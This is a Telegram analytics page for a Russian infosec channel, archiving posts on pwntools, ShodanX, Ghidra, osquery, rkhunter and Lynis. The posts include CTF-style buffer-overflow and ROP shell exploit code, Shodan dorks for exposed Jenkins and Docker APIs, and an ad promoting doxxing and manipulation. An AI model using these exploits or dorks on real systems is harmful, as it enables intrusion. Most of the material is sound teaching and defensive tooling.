es
Feedback
CodeGuard: PySec Edition

CodeGuard: PySec Edition

Canal cerrado

Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

Mostrar más

📈 Análisis del canal de Telegram CodeGuard: PySec Edition

El canal CodeGuard: PySec Edition es un actor destacado. Actualmente la comunidad reúne a 14 097 suscriptores, ocupando la posición 8 760 en la categoría Tecnologías y Aplicaciones y el puesto 45 869 en la región Rusia.

📊 Métricas de audiencia y dinámica

Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 14 097 suscriptores.

Según los últimos datos del 26 septiembre, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 821, y en las últimas 24 horas de 0, conservando un alto alcance.

  • Estado de verificación: No verificado
  • Tasa de interacción (ER): El promedio de interacción de la audiencia es 9.98%. Durante las primeras 24 horas tras publicar, el contenido suele obtener 5.58% de reacciones respecto al total de suscriptores.
  • Alcance de las publicaciones: Cada publicación recibe en promedio 1 407 visualizaciones. En el primer día suele acumular 786 visualizaciones.
  • Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 8.
  • Intereses temáticos: El contenido se centra en temas clave como codeguard, pysec, docker, grep, контейнер.

📝 Descripción y política de contenido

El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”

Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 27 septiembre, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.

14 097
Suscriptores
Sin datos24 horas
+2477 días
+82130 días
Archivo de publicaciones
Пиздюк обозвал твою мать и у тебя два варианта: 1. Кинуть в чс и пойти плакать 2. Подписаться на блог хаkера DR. BLACK, и пр0
Пиздюк обозвал твою мать и у тебя два варианта: 1. Кинуть в чс и пойти плакать 2. Подписаться на блог хаkера DR. BLACK, и пр0бuть дауна до пробабушки: – как пр0бuть человека по фото – как заставить извиняться даже быдло – как обезопасить себя от доksа – как манuпулировать людьми через переписку – серые схемы заработка Этот канал преследуется ФБР, подпишись пока не закрыли: https://t.me/+iPq8cprYhmFkZjli

🤖Pwntools: когда эксплоит пишется быстрее, чем оправдание в полиции Если ты когда-либо пытался наколхозить эксплоит в Notepad++, а потом два часа искал, почему шеллкод не работает — встречай: pwntools. Это не просто библиотека, это целый арсенал для тех, кто хочет автоматизировать свой баунти-хаос. Питон, асм и немного чёрной магии — вот рецепт успеха. ⚙️ На что способен этот франкенштейн:
▶️ CTF-мод — автоматизируем всё, что движется: от брута флагов до ROP-цепочек Шеллкод на коленке — генерируем, пакуем и тестим без лишних телодвижений ▶️ Работа с бинарником — ищем гаджеты, дырявим GOT/PLT, дизлайбим либы ▶️ Сетевое общение — TCP/UDP, шелл, SSH — общаемся с жертвой как с другом ▶️ Дебёг как бог — GDB-интеграция, брейкпоинты, трассировка без слёз
💻 Ставим эту магию (Python 3.6+ или иди нахуй):
pip install pwntools  # если не сломалось — ты счастливчик
🚀 Быстрый старт (для тех, кто не любит читать мануалы): Простой пример — подключиться к серверу и получить флаг:
from pwn import *

# Подключаемся к таске
conn = remote('ctf.example.com', 1337)

# Ждём приветствия
conn.recvuntil(b'Enter password:')

# Шлём наш гениальный эксплоит
conn.sendline(b'A' * 64 + p64(0x401152))  # переполнение буфера + адрес победы

# Получаем флаг и улыбаемся
print(conn.recvall().decode())
🛠 Продвинутые фишки (когда нужно выебать ядро): ROP-цепочка для обхода DEP:
from pwn import *

context.binary = './vuln'

# Автоматически ищем гаджеты
rop = ROP(context.binary)
rop.execve(next(context.binary.search(b'/bin/sh')), 0, 0)

# Собираем полезную нагрузку
payload = flat(
    b'A' * 64,
    rop.chain()
)

# Отправляем и получаем шелл
io = process('./vuln')
io.sendline(payload)
io.interactive()  # welcome to root!
Интеграция с GDB (для параноиков):
io = gdb.debug('./vuln', gdbscript='''
    break *main+0x42
    continue
''')

# Смотрим дамп памяти после краша
io.wait()
core = io.corefile
print(hex(core.rsp))  # где упал — там и ищи сокровища
📌 Когда использовать эту хрень:
🔴 CTF — если надоело вручную собирать эксплоиты 🔴 Баг-баунти — тестируем веб-сервисы на устойчивость к пиздецу 🔴 Образование — учимся эксплоитингу без скучных мануалов 🔴 Исследования — разбираемся, как ломаются бинарники вживую
⚠️Предупреждение (шоб мусора не навести):
🔵Используй только на своих тасках или с разрешения владельца 🔵Не забывай про context.log_level = 'debug' — иногда полезно увидеть, что там внутри творится 🔵Если эксплоит не работает — это не баг, это фича. Перечитай доки.
💡 Совет: Начни с локальных бинарников из CTF-тасок — так безопаснее и проще понять, как эта бандура работает. А потом уже можно и на реальные цели переходить (если разрешили, конечно). 😈 CodeGuard: PySec Edition | Чат

🤖Pwntools: когда эксплоит пишется быстрее, чем оправдание в полиции Если ты когда-либо пытался наколхозить эксплоит в Notepad++, а потом два часа искал, почему шеллкод не работает — встречай: pwntools. Это не просто библиотека, это целый арсенал для тех, кто хочет автоматизировать свой баунти-хаос. Питон, асм и немного чёрной магии — вот рецепт успеха. ⚙️ На что способен этот франкенштейн:
▶️ CTF-мод — автоматизируем всё, что движется: от брута флагов до ROP-цепочек Шеллкод на коленке — генерируем, пакуем и тестим без лишних телодвижений ▶️ Работа с бинарником — ищем гаджеты, дырявим GOT/PLT, дизлайбим либы ▶️ Сетевое общение — TCP/UDP, шелл, SSH — общаемся с жертвой как с другом ▶️ Дебёг как бог — GDB-интеграция, брейкпоинты, трассировка без слёз
💻 Ставим эту магию (Python 3.6+ или иди нахуй):
pip install pwntools  # если не сломалось — ты счастливчик
🚀 Быстрый старт (для тех, кто не любит читать мануалы): Простой пример — подключиться к серверу и получить флаг:
from pwn import *

# Подключаемся к таске
conn = remote('ctf.example.com', 1337)

# Ждём приветствия
conn.recvuntil(b'Enter password:')

# Шлём наш гениальный эксплоит
conn.sendline(b'A' * 64 + p64(0x401152))  # переполнение буфера + адрес победы

# Получаем флаг и улыбаемся
print(conn.recvall().decode())
🛠 Продвинутые фишки (когда нужно выебать ядро): ROP-цепочка для обхода DEP:
from pwn import *

context.binary = './vuln'

# Автоматически ищем гаджеты
rop = ROP(context.binary)
rop.execve(next(context.binary.search(b'/bin/sh')), 0, 0)

# Собираем полезную нагрузку
payload = flat(
    b'A' * 64,
    rop.chain()
)

# Отправляем и получаем шелл
io = process('./vuln')
io.sendline(payload)
io.interactive()  # welcome to root!
Интеграция с GDB (для параноиков):
io = gdb.debug('./vuln', gdbscript='''
    break *main+0x42
    continue
''')

# Смотрим дамп памяти после краша
io.wait()
core = io.corefile
print(hex(core.rsp))  # где упал — там и ищи сокровища
📌 Когда использовать эту хрень:
🔴 CTF — если надоело вручную собирать эксплоиты 🔴 Баг-баунти — тестируем веб-сервисы на устойчивость к пиздецу 🔴 Образование — учимся эксплоитингу без скучных мануалов 🔴 Исследования — разбираемся, как ломаются бинарники вживую
⚠️Предупреждение (шоб мусора не навести):
🔵Используй только на своих тасках или с разрешения владельца 🔵Не забывай про context.log_level = 'debug' — иногда полезно увидеть, что там внутри творится 🔵Если эксплоит не работает — это не баг, это фича. Перечитай доки.
💡 Совет: Начни с локальных бинарников из CTF-тасок — так безопаснее и проще понять, как эта бандура работает. А потом уже можно и на реальные цели переходить (если разрешили, конечно). 😈 CodeGuard: PySec Edition | Чат

🌐 ShodanX — терминальный боец для разведки на базе Shodan ShodanX — это мощный терминальный инструмент для OSINT и реконнесс
🌐 ShodanX — терминальный боец для разведки на базе Shodan ShodanX — это мощный терминальный инструмент для OSINT и реконнессанса, построенный поверх API Shodan. Он превращает рутинный поиск в интернете вещей, серверов и уязвимостей в автоматизированный конвейер с цветным выводом и модульной архитектурой. Для пентестеров, исследователей угроз и красных команд, которым нужен Shodan на стероидах прямо в терминале. ⚙️ Ключевые возможности ShodanX:
▶️ Модульная разведка — 15+ специализированных команд для доменов, поддоменов, SSL, организаций ▶️ Работа с базами Shodan — доступ к CVE Database, EntityDB, ExposureDB, FaviconMap ▶️ Визуализация данных — географическое отображение (map) exposed-сервисов по миру ▶️ Расширенные запросы — поддержка кастомных dorks и фильтров Shodan ▶️ Пассивное обнаружение — поиск поддоменов через DNS-данные Shodan без прямого взаимодействия с целью ▶️ Интеграция с InternetDB — быстрый анализ IP и доменов через lightweight API Shodan
✨ Быстрый старт с ShodanX: Установка (требуется Python 3.13+):
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages
Первоначальная настройка:
# 1. Сохраняем API-ключ Shodan
shodanx auth

# 2. Логин через session cookie (для премиум-функций)
shodanx login
# Куки копируем из DevTools: .shodan.io → session

# 3. Проверяем доступ
shodanx login
Базовые команды разведки:
# Разведка по домену (порты, хосты, метаданные)
shodanx domain example.com

# Пассивный поиск поддоменов
shodanx subdomain example.com

# Поиск по SSL-отпечатку (tracking reused certs)
shodanx ssl <sha1_fingerprint>

# Организационный поиск (использование facets)
shodanx org "Company Name"

# Поиск уязвимых систем через CVE
shodanx cvedb CVE-2024-12345
🔍 Продвинутые сценарии: Географическая визуализация exposed-сервисов:
# Требуется премиум-подписка Shodan
shodanx map "port:22 country:RU"
Кастомные dorks для bug bounty:
# Поиск Jenkins без аутентификации
shodanx custom 'http.component:jenkins "200 OK"'

# Поиск открытых Docker API
shodanx custom 'product:docker port:2375'
Трекинг инфраструктуры через favicon:
# Поиск систем по уникальному фавикону
shodanx faviconmap <favicon_hash>
📌 Когда использовать ShodanX: 🔴 Расширение атакуемой поверхности — автоматический поиск забытых сервисов и поддоменов 🔴 Подготовка к внешнему пентесту — разведка открытых портов и технологий цели 🔴 Threat Intelligence — мониторинг эксплойтов в дикой природе через CVE-привязку 🔴 Исследование IoT/инфраструктуры — картографирование сетей по организациям и странам 🔴 Расследование инцидентов — поиск следов компрометации в открытых источниках 🛠 Интеграция в пайплайн:
# Пример скрипта для автоматической разведки
#!/bin/bash
DOMAIN=$1

echo "[*] Starting ShodanX reconnaissance for $DOMAIN"
shodanx domain $DOMAIN > domain_scan.json
shodanx subdomain $DOMAIN > subdomains.txt
shodanx ssl $(get_ssl_fingerprint $DOMAIN) > ssl_assets.json

# Дальнейшая обработка через jq, grep и т.д.
⚠️ Требования и ограничения: 🔴 API-ключ Shodan обязателен (бесплатный аккаунт — 100 запросов/месяц) 🔴 Session cookie нужен для функций map и trends (премиум-подписка) 🔴 Shodan Enterprise требуется для модуля trends (анализ исторических данных) 🔴 Python 3.13+ — более старые версии не поддерживаются 📌 Ссылка на репозиторий 💡 Совет: Начните с бесплатного API-ключа Shodan, чтобы оценить возможности. Для серьезной работы потребуется платная подписка ($59/месяц), но даже бесплатный лимит позволяет проводить точечную разведку. 😈 CodeGuard: PySec Edition | Чат

Подписка на кодогенерацию Дорогая? 😎 Lama Agent — топовые модели (GPT-5, Claude, Gemini) внедряются прямо в IDE и пишут код
Подписка на кодогенерацию Дорогая? 😎 Lama Agent — топовые модели (GPT-5, Claude, Gemini) внедряются прямо в IDE и пишут код за вас! - 200 запросов в день(6200 в месяц) - Доступен в ✴️ VS Code, 👩‍💻 JetBrains, ✴️ Claude Code, PyCharm - Всего за ₽699 - в 12 раз больше запросов, чем в курсоре, а цена в 4 раза меньше. 😲 Lama Bot — тг-бот с лучшими нейросетями! - 200 запросов в день - Всего за ₽499 в месяц (есть и бесплатные модели) - ChatGPT, nano banana pro, sora image, доступен, текст редактирование изображений, генерация. - Бери и пользуйся — быстро и без рекламы 😱 Lama AI — узнавай самым первым о последних новостях из мира AI, IT и гик индустрии. Цена — бесценно.

Кибердзюцу. Кибербезопасность для современных ниндзя 🥷 «Кибердзюцу» это уникальное исследование, в котором стратегии древних
Кибердзюцу. Кибербезопасность для современных ниндзя 🥷 «Кибердзюцу» это уникальное исследование, в котором стратегии древних японских шпионов адаптируются под современные реалии информационной безопасности. Автор, бывший специалист по кибервойнам в АНБ и армии США, проводит параллели между защитой средневековых замков и охраной корпоративных сетей. Что внутри:
🔵Разведка и картография 🔵Социальная инженерия 🔵Скрытность и импланты 🔵Защита от атрибуции
Нравятся книга? ❤️ — Да 🔥 — Нет 👩‍💻 Кликай и качай 😈 CodeGuard: PySec Edition | Чат

🔍 Ghidra — когда бинарник говорит правду Имя файла, иконка и описание могут врать. Бинарник — нет. Ghidra позволяет разобрат
🔍 Ghidra — когда бинарник говорит правду Имя файла, иконка и описание могут врать. Бинарник — нет. Ghidra позволяет разобрать исполняемый файл и понять, что он реально делает. ⚙️ Ключевые возможности
🟢 Декомпиляция в читаемый псевдокод 🟢Анализ ELF / PE / Mach‑O 🟢 Автоматизация и скрипты 🟢Кроссплатформенность 🟢 Open Source от NSA
🧠 Зачем она нужна
➡️ Реверс-инжиниринг и аудит безопасности ➡️Анализ вредоносного ПО ➡️ Изучение low‑level логики ➡️ Обучение и практика ➡️ Бесплатная альтернатива IDA Pro
🧪 Использование из терминала Запуск Ghidra:
./ghidraRun
Анализ бинарника в headless‑режиме (без GUI):
./analyzeHeadless ~/ghidra_projects test_project \
  -import ./binary \
  -analysisTimeoutPerFile 60
Запуск анализа с авто‑декомпиляцией:
./analyzeHeadless ~/ghidra_projects test_project \
  -import ./binary \
  -postScript DecompileAllFunctions.java
Удаление проекта:
rm -rf ~/ghidra_projects/test_project
🔗 Исходники 😈 CodeGuard: PySec Edition | Чат

🔐Threat, Vulnerability, Risk — как не путаться в терминах ИБ В инфобезе эти слова звучат постоянно, но их часто используют к
🔐Threat, Vulnerability, Risk — как не путаться в терминах ИБ В инфобезе эти слова звучат постоянно, но их часто используют как синонимы. Из-за этого начинаются странные разговоры в стиле «у нас риск в коде» или «давай закроем угрозу патчем». Разложим по полочкам. 🔥 Threat (Угроза) Угроза — это потенциальный источник вреда. То, что может навредить системе, данным или бизнесу. Примеры:
🔹 Хакер или инсайдер 🔹 Вредоносное ПО 🔹 Фишинг 🔹 Ошибка администратора 🔹 Пожар, отключение электричества
Угроза сама по себе ещё ничего не ломает — она лишь существует. 🔸 Vulnerability (Уязвимость) Уязвимость — это слабое место, через которое угроза может реализоваться. Примеры:
🔹 Необновлённый софт 🔹 Пароль admin123 🔹 Открытый S3-бакет 🔹 Отсутствие MFA 🔹 Лишние права у пользователя
Уязвимость без угрозы — просто дефект. Угроза без уязвимости — почти бесполезна. ⚠️ Risk (Риск) Риск — это вероятность + ущерб, если угроза использует уязвимость. Примеры:
🔹 Утечка ПДн клиентов 🔹 Простой сервиса 🔹 Штрафы и репутационные потери 🔹 Потеря интеллектуальной собственности
В ИБ борются не с угрозами, а с рисками. 🧠 Как это связано?
🔴 Угроза — кто или что может атаковать 🔵 Уязвимость — через что могут атаковать ⏺ Риск — что будет, если это случится
Если по-простому:
➡️ Патч закрывает уязвимость ➡️ Антивирус снижает влияние угрозы ➡️ Бизнес решает, какой риск допустим
😈 CodeGuard: PySec Edition | Чат

MACHINE LEARNING - экспертный канал, который держит тебя в актуальном AI-стеке. Ключевая ценность - структура и наглядность:
+4
MACHINE LEARNING - экспертный канал, который держит тебя в актуальном AI-стеке. Ключевая ценность - структура и наглядность: сложные концепции объясняют через схемы и короткие видео, чтобы ты не просто “прочитал”, а реально понял и мог применить. Если хочешь больше - здесь полезные ресурсы для МЛ-специалиста: книги, вакансии, вопросы с собесов, мастер-классы. Канал как бесплатный мини-курс по ИИ, который обновляется каждый день - t.me/ai_machinelearning_big_data

— CodeGuard: Linux — CodeGuard: Academy — CodeGuard: OSINT [new] — CodeGuard: Python — CodeGuard: SciencePop — CodeGuard: Vacancy IT Проверка, ты этого не видел

👁 osquery — SQL-допрос твоей системы osquery — это не антивирус и не сканер. Это фреймворк, который превращает ОС в базу дан
👁 osquery — SQL-допрос твоей системы osquery — это не антивирус и не сканер. Это фреймворк, который превращает ОС в базу данных, где процессы, пользователи, сокеты и крон-задачи — обычные таблицы. Хочешь знать, что реально происходит в системе? Просто спроси SQL-запросом. Идеален, если:
🟢 нужен контроль и видимость, а не разовый чек 🟢 важно ловить аномалии, а не только известные сигнатуры 🟢 сервер/хост живёт долго и меняется со временем 🟢 хочется гибкую основу под security-мониторинг
⚙️ Ключевые возможности osquery:
🔵 Доступ к процессам, файлам, сокетам, пользователям через SQL 🔵 Поиск подозрительных бинарей, автозапусков, cron-задач 🔵 Мониторинг сетевых соединений и открытых портов 🔵 Scheduled queries + логирование изменений 🔵 Интеграция с SIEM, Elastic, Fleet, Loki и др.
⚡️ Примеры реальных запросов:
-- Все процессы, слушающие сеть
SELECT pid, name, local_port FROM listening_ports;

-- Подозрительные cron-задачи
SELECT * FROM crontab WHERE command NOT LIKE '%/usr%';

-- Новые бинарники в /tmp
SELECT * FROM file WHERE path LIKE '/tmp/%';
📌 Что реально помогает найти:
🟢 скрытые persistence-механизмы 🟢 нелегитимные сетевые соединения 🟢 странные cron / systemd-юниты 🟢 появление новых пользователей и ключей 🟢 медленные, «тихие» компрометации
Где osquery раскрывается:
🔴 Прод-сервера и VPS 🔴 Хосты с долгим аптаймом 🔴 SOC / blue team / IR 🔴 В связке с rkhunter, AIDE, Wazuh 🔴 Как основа для кастомного security-мониторинга
😈 CodeGuard: PySec Edition | Чат

Программисты, это вам 👇 Держите 5 каналов, которые реально помогают изучать программирование и IT с полного нуля: 🖥 Easy Co
Программисты, это вам 👇 Держите 5 каналов, которые реально помогают изучать программирование и IT с полного нуля: 🖥 Easy Coder — все направления IT. 👩‍💻 Easy Python — всё о Python. 🌐 Easy WebDev — Frontend, Backend. 🔠 Easy InfoSec — ИБ, Хакинг. 🖥 Easy GitHub — лучшее с GitHub. Тонны бесплатной инфы для любого уровня подготовки ✔️

🔎 rkhunter — параноик, который не спит на твоём сервере rkhunter (Rootkit Hunter) — классический инструмент для Linux/Unix,
🔎 rkhunter — параноик, который не спит на твоём сервере rkhunter (Rootkit Hunter) — классический инструмент для Linux/Unix, предназначенный для обнаружения руткитов, бэкдоров и подозрительных конфигураций. В отличие от «быстрых» сканеров, копает глубже и умеет работать как регулярный сторож системы. Идеален, если:
🟢 нужен более тщательный аудит, чем «разок проверить» 🟢 важно отслеживать изменения системы со временем 🟢 сервер живёт долго и не должен удивлять сюрпризами 🟢 хочется early-warning, а не post-mortem
⚙️ Ключевые возможности rkhunter:
🔵 Поиск известных руткитов, бэкдоров и локальных эксплойтов 🔵 Проверка системных бинарников по хешам 🔵 Анализ прав доступа и опасных конфигураций 🔵 Детект скрытых файлов, процессов и сетевых аномалий 🔵 Логи + режим регулярного cron-сканирования
⚡️ Быстрый старт с rkhunter: Установка:
sudo apt install rkhunter        # Debian/Ubuntu
sudo dnf install rkhunter        # RHEL/CentOS
Обновление сигнатур:
sudo rkhunter --update
Первичное сканирование:
sudo rkhunter --check
📌 Что реально находит:
🟢 подмену системных утилит (ls, ps, netstat и др.) 🟢 подозрительные права на важные файлы 🟢 следы популярных руткитов и бэкдоров 🟢 небезопасные настройки SSH, cron, sysctl 🟢 аномалии, появившиеся после взлома
Где использовать rkhunter:
🔴 Долгоживущие прод‑серверы 🔴 VPS с публичным доступом 🔴 Регулярный security‑мониторинг через cron 🔴 В связке с Chkrootkit, Lynis, AIDE 🔴 Как система раннего оповещения, а не «после пожара»
😈 CodeGuard: PySec Edition | Чат

🔎 Chkrootkit — охотник за руткитами на твоей системе Chkrootkit — лёгкий, но мощный сканер для Linux/Unix, который ищет след
🔎 Chkrootkit — охотник за руткитами на твоей системе Chkrootkit — лёгкий, но мощный сканер для Linux/Unix, который ищет следы руткитов, троянов и локальных эксплойтов. Быстро проверяет систему и сигнализирует о подозрительных файлах и процессах. Идеален, если:
🟢 нужно быстро проверить сервер без установки агентов 🟢 важен простой аудит безопасности 🟢 хочется понять, не скрываются ли в системе угрозы
⚙️ Ключевые возможности Chkrootkit:
🔵 Проверка известных руткитов и троянов 🔵 Сканирование системных процессов и модулей ядра 🔵 Поиск подозрительных бэкендов inetd, sshd, cron 🔵 Проверка ключевых бинарников на модификации 🔵 Лёгкий, работает без сети и демонов
⚡️ Быстрый старт с Chkrootkit: Установка:
sudo apt install chkrootkit        # Debian/Ubuntu  
sudo dnf install chkrootkit        # RHEL/CentOS  
Запуск сканирования:
sudo chkrootkit
📌 Что реально находит:
🟢 скрытые процессы и демоны 🟢 подменённые системные бинарники 🟢 следы популярных руткитов 🟢 подозрительные сетевые подключения 🟢 эксплойты локальных сервисов
Где использовать Chkrootkit:
🔴 Быстрый security-чек на прод-серверах 🔴 Регулярные проверки VPS и домашних серверов 🔴 В связке с Lynis, AIDE или auditd 🔴 Как baseline перед детальным pentest’ом
😈 CodeGuard: PySec Edition | Чат

🔬Dogbolt - декомпилятор на стероидах Закинул бинарник - получил сравнение результатов от 11 декомпиляторов сразу. Ghidra, ID
🔬Dogbolt - декомпилятор на стероидах Закинул бинарник - получил сравнение результатов от 11 декомпиляторов сразу. Ghidra, IDA, Binary Ninja, Hex-Rays, RetDec и другие - все работают параллельно, результаты рядом. Что внутри:
🔵Поддержка ELF, PE, Mach-O 🔵x86, x64, ARM, MIPS 11 движков декомпиляции одновременно 🔵Сравнение выхода side-by-side 🔵Шаринг результатов по ссылке 🔵Бесплатно, без регистрации
💡Почему стоит в закладки:
🔴Один декомпилятор выдал мусор - другой справился 🔴Не нужно ставить тяжёлые тулзы локально 🔴Быстрый анализ CTF-тасков 🔴Видишь как разные инструменты интерпретируют один код 🔴Учишься понимать, какой декомпилятор лучше для чего
Типичный юзкейс: Скачал подозрительный .exe или получил бинарь на CTF. Закинул в Dogbolt - через минуту читаешь псевдо-C код из 11 источников. Ghidra показал undefined4? Binary Ninja уже распознал структуру. Незаменим для reverse engineering, malware analysis и когда IDA тупит. ⭐️Сервис 😈 CodeGuard: PySec Edition | Чат

👨‍💻 Этот канал экономит разработчикам время VibeCode - место для тех, кто пишет код и хочет делать это эффективнее⚡️ В Vibe
👨‍💻 Этот канал экономит разработчикам время VibeCode - место для тех, кто пишет код и хочет делать это эффективнее⚡️ В VibeCode HUB ты найдёшь: • практические советы • примеры программирования • полезный софт для разработки • актуальные новости из мира IT 📎 А если ты хочешь стать программистом - в ближайшее время также запускаем обучающие каналы по Web, Python, C++ и Кибербезопасности. Подписывайся и оптимизируй не только код, но и своё время👇 https://t.me/vibecode_hub

🛡 Lynis — хардкорный аудит безопасности без лишней магии Lynis — это автономный security-аудитор для Linux/Unix, который ска
🛡 Lynis — хардкорный аудит безопасности без лишней магии Lynis — это автономный security-аудитор для Linux/Unix, который сканирует систему и говорит прямо, где у тебя дыры, слабые места и что можно усилить уже сейчас. Идеален, если:
🟢 нужен быстрый security-чек без агентов 🟢 важно понять реальный уровень hardening 🟢 система уже в проде и ломать ничего нельзя
⚙️ Ключевые возможности Lynis:
🔵 Глубокий аудит конфигурации ОС 🔵 Проверка прав, сервисов, kernel-настроек 🔵 Анализ SSH, PAM, cron, logging, firewall 🔵 Security score + конкретные рекомендации 🔵 Работает локально, без демонов и сети
⚡️ Быстрый старт с Lynis: Установка:
sudo apt install lynis        # Debian/Ubuntu
sudo dnf install lynis        # RHEL/CentOS
Запуск аудита:
sudo lynis audit system
Отчёты:
/var/log/lynis.log
/var/log/lynis-report.dat
📌 Что реально находит:
🟢 слабые SSH-настройки 🟢 небезопасные kernel-параметры 🟢 лишние сервисы и демоны 🟢 проблемы с правами и логированием 🟢 плохие практики hardening
Где использовать Lynis:
🔴 Быстрый аудит перед продом 🔴 Регулярные security-чеки серверов 🔴 Hardened-хосты и VPS 🔴 В связке с AIDE / auditd / SIEM 🔴 Как baseline перед pentest’ом
😈 CodeGuard: PySec Edition | Чат